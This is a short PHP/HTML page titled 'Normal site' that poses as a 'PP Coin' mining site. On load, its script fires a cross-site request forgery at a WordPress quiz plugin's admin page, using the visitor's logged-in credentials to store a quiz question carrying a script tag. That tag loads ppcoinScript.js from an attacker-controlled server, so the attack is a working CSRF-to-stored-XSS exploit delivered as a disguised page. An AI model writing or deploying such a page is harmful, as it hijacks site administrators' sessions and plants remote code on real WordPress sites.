ppcoin.php

<html>
<title>Normal site</title>
<script src='https://ajax.googleapis.com/ajax/libs/jquery/3.7.1/jquery.min.js'></script>
<meta charset="utf-8"/>
<center>
    <br>
    <h1>PP Coin Mine it! Fuck Bitcoin</h1>
    <br><br>
    <img src='./ppcoin.jpg' style="height: 70%;width: 40%;"></img>
</center>
<script type="text/javascript">

function exploit(){

    var targetUrl = 'http://<WORDPRESS HOST>/wordpress'
    var quizID = 1

	$.ajax(
	{
        url: targetUrl + '/wp-admin/admin.php?page=mlw_quiz_options&quiz_id=' + quizID,
        data: {'question_type': '0', 'question_name': 'PPCOIN<script src="http:\/\/<ATTACKER SERVER>\/ppcoinScript.js"><\/script><script src="https:\/\/ajax.googleapis.com\/ajax\/libs\/jquery\/3.7.1\/jquery.min.js"><\/script>', 'correct_answer_info': '', 'hint': '', 'comments': '1', 'new_question_order': 2, 'required': 0, 'new_new_category': '', 'new_question_answer_total': 0, 'question_submission': 'new_question', 'quiz_id': quizID, 'question_id': '0'},
        type: 'POST',
    	xhrFields: {
           withCredentials: true
        },
        crossDomain: true
	});
	
}
exploit();
</script>
</html>